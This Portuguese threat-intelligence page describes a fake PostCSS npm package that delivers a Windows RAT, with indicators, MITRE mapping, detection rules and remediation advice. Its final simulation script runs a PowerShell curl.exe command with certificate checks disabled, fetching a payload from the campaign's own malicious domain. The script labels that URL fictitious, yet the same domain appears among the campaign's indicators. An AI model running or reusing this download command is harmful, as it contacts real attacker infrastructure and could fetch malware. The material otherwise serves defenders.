PostCSS Disfarçado como um Caminho para Entrega de RAT no Windows
Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Atacantes estão abusando da personificação de pacotes npm para disseminar um RAT de múltiplos estágios no Windows. Pacotes maliciosos como postcss-minify-selector-parser são apresentados como utilitários de build legítimos para comprometer ambientes de desenvolvedores. Uma vez acionada, a cadeia de infecção lança um downloader PowerShell que busca um RAT Python compilado com Nuitka, capaz de roubar credenciais e fornecer acesso remoto por shell.
Investigação
Pesquisadores descobriram um conjunto de pacotes npm maliciosos que referenciam dependências legítimas para parecerem críveis. A investigação mapeou uma cadeia de infecção em camadas que começa com um dropper JavaScript, avança para um downloader PowerShell e termina com uma carga útil sofisticada baseada em Python. Ao analisar os componentes compilados com Nuitka, os pesquisadores foram capazes de reconstruir o protocolo de comando e controle do RAT e os comandos suportados.
Mitigação
Os usuários devem remover imediatamente os pacotes npm maliciosos identificados e revisar as árvores de dependência para qualquer exposição transitiva. As organizações também devem bloquear os domínios e endereços IP de comando e controle conhecidos. Se houver suspeita de comprometimento, os desenvolvedores devem girar as credenciais armazenadas no navegador e todos os tokens relacionados ao desenvolvimento sem demora.
Resposta
Os endpoints do Windows devem ser examinados para artefatos como %TEMP%winPatch, %TEMP%.store, e %TEMP%.host. Os investigadores também devem revisar a persistência na chave de registro HKCURun para o valor csshost . Deve-se realizar uma auditoria completa das estações de trabalho dos desenvolvedores para identificar atividades remotas não autorizadas ou sinais de roubo de credenciais.
"graph TB %% Class Definitions classDef technique fill:#99ccff classDef malware fill:#ff9999 classDef tool fill:#cccccc classDef persistence fill:#99ff99 %% Node Definitions attack_supply_chain["<b>Técnica</b> – <b>T1195.001 Comprometimento da Cadeia de Suprimentos: Comprometimento de Dependências de Software e Ferramentas de Desenvolvimento</b><br/><b>Descrição</b>: Personificação de pacotes no npm via pacotes semelhantes, como postcss-minify-selector-parser.<br/><b>Alvo</b>: Ambientes de desenvolvedores"] class attack_supply_chain technique attack_user_execution["<b>Técnica</b> – <b>T1204.005 Execução do Usuário: Biblioteca Maliciosa</b><br/><b>Descrição</b>: Acionado quando o pacote npm malicioso é importado.<br/><b>Ação</b>: Executa um dropper JavaScript codificado."] class attack_user_execution technique process_powershell["<b>Técnica</b> – <b>T1059.001 Interpretador de Comandos e Scripts: PowerShell</b><br/><b>Descrição</b>: O PowerShell é usado para escrever e executar o script malicioso.<br/><b>Arquivo</b>: ../../settings.ps1"] class process_powershell technique attack_indicator_removal["<b>Técnica</b> – <b>T1070.010 Remoção de Indicador: Realocação de Malware</b><br/><b>Descrição</b>: Uso de um domínio enganoso para baixar a carga útil.<br/><b>Domínio</b>: nvidiadriver[.]net"] class attack_indicator_removal technique tool_cmd_shell["<b>Técnica</b> – <b>T1059.003 Interpretador de Comandos e Scripts: Shell de Comando do Windows</b><br/><b>Descrição</b>: Usado para extrair o pacote da carga útil.<br/><b>Acionamento</b>: Execução pós-download."] class tool_cmd_shell technique malware_vbs_bootstrapper["<b>Malware</b> – <b>Inicializador VBS</b><br/><b>Descrição</b>: Lança a carga útil principal de malware."] class malware_vbs_bootstrapper malware malware_rat["<b>Malware</b> – <b>Ferramenta de Acesso Remoto (RAT)</b><br/><b>Descrição</b>: Carregador baseado em Python utilizando módulos compilados com Nuitka.<br/><b>Funcionalidade</b>: Fornece capacidades de acesso remoto."] class malware_rat malware attack_persistence["<b>Técnica</b> – <b>T1547.001 Execução de Inicialização ou Logon: Chaves de Inicialização do Registro / Pasta de Inicialização</b><br/><b>Descrição</b>: Cria um valor de registro para persistência.<br/><b>Valor do Registro</b>: csshost"] class attack_persistence persistence attack_evasion["<b>Técnica</b> – <b>T1497.001 Evasão de Virtualização/Sandbox: Verificações de Sistema</b><br/><b>Descrição</b>: Usa consultas WMI para detectar ambientes virtuais.<br/><b>Comando</b>: wmic bios get serialnumber"] class attack_evasion technique attack_c2["<b>Técnica</b> – <b>T1219 Ferramentas de Acesso Remoto</b><br/><b>Descrição</b>: Mantém comunicação com o servidor C2 via pacotes POST criptografados.<br/><b>Endereço C2</b>: hxxp[:]//95[.]216[.]92[.]207:8080"] class attack_c2 technique attack_credential_access["<b>Técnica</b> – <b>T1555.003 Credenciais de Armazenadores de Senhas: Credenciais de Navegadores Web</b><br/><b>Descrição</b>: Rouba credenciais salvas do Chrome.<br/><b>Arquivos Alvo</b>: Dados de Login e Estado Local"] class attack_credential_access technique %% Connections attack_supply_chain –>|leads_to| attack_user_execution attack_user_execution –>|executes| process_powershell process_powershell –>|performs| attack_indicator_removal attack_indicator_removal –>|triggers| tool_cmd_shell tool_cmd_shell –>|launches| malware_vbs_bootstrapper malware_vbs_bootstrapper –>|installs| malware_rat malware_rat –>|establishes| attack_persistence malware_rat –>|performs| attack_evasion malware_rat –>|communicates_via| attack_c2 malware_rat –>|exfiltrates| attack_credential_access "
Fluxo de Ataque
Detecções
LOLBAS WScript / CScript (via criação de processo)
Ver
Uso Suspeito de CURL (via linha de comando)
Ver
Possível Enumeração de Sistema (via linha de comando)
Ver
Um Arquivo foi Extraído para Diretório Suspeito Usando PowerShell (via powershell)
Ver
Script PowerShell Baixando Carga Maliciosa [PowerShell do Windows]
Ver
Detecção de Conexão de Rede Maliciosa Imitando Download de Driver Legítimo [Conexão de Rede do Windows]
Ver
Detecção de Execução de PowerShell Malicioso e Script Carregador [Criação de Processo do Windows]
Ver
## Execução da Simulação
Pré-requisito: A Verificação Pré-voo de Telemetria e Base deve ter sido aprovada.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.
-
Narrativa & Comandos de Ataque: O adversário pretende estabelecer uma posição no sistema mascarando-se como um processo legítimo de atualização de software. Para isso, eles usam o PowerShell para invocar o utilitário nativo
curl.exeUtilitário. Ao usar o sinalizador-k(inseguro), eles contornam a validação do certificado SSL, e ao especificar um caminho de destino em$env:TEMPcom um nome de arquivo comowinPatch.zip, eles tentam se misturar ao ruído de atualizações de sistema de rotina. O objetivo é baixar uma carga maliciosa que, uma vez executada, fornece acesso remoto. -
Script de Teste de Regressão:
# Script de simulação para acionar a regra de detecção específica # Nota: Isto usa um URL fictício por segurança, mas imita a estrutura exata exigida pela regra. $cmd = 'curl.exe -k -o "$env:TEMPwinPatch.zip" https://nvidiadriver.net/verv1432/winpatch-xd7d.win' Write-Host "Executando comando de download malicioso simulado..." Invoke-Expression $cmd -
Comandos de Limpeza:
# Limpar o arquivo fictício baixado if (Test-Path "$env:TEMPwinPatch.zip") { Remove-Item -Path "$env:TEMPwinPatch.zip" -Force Write-Host "Limpeza bem-sucedida: Arquivo fictício removido." } else { Write-Host "Limpeza: Arquivo não encontrado." }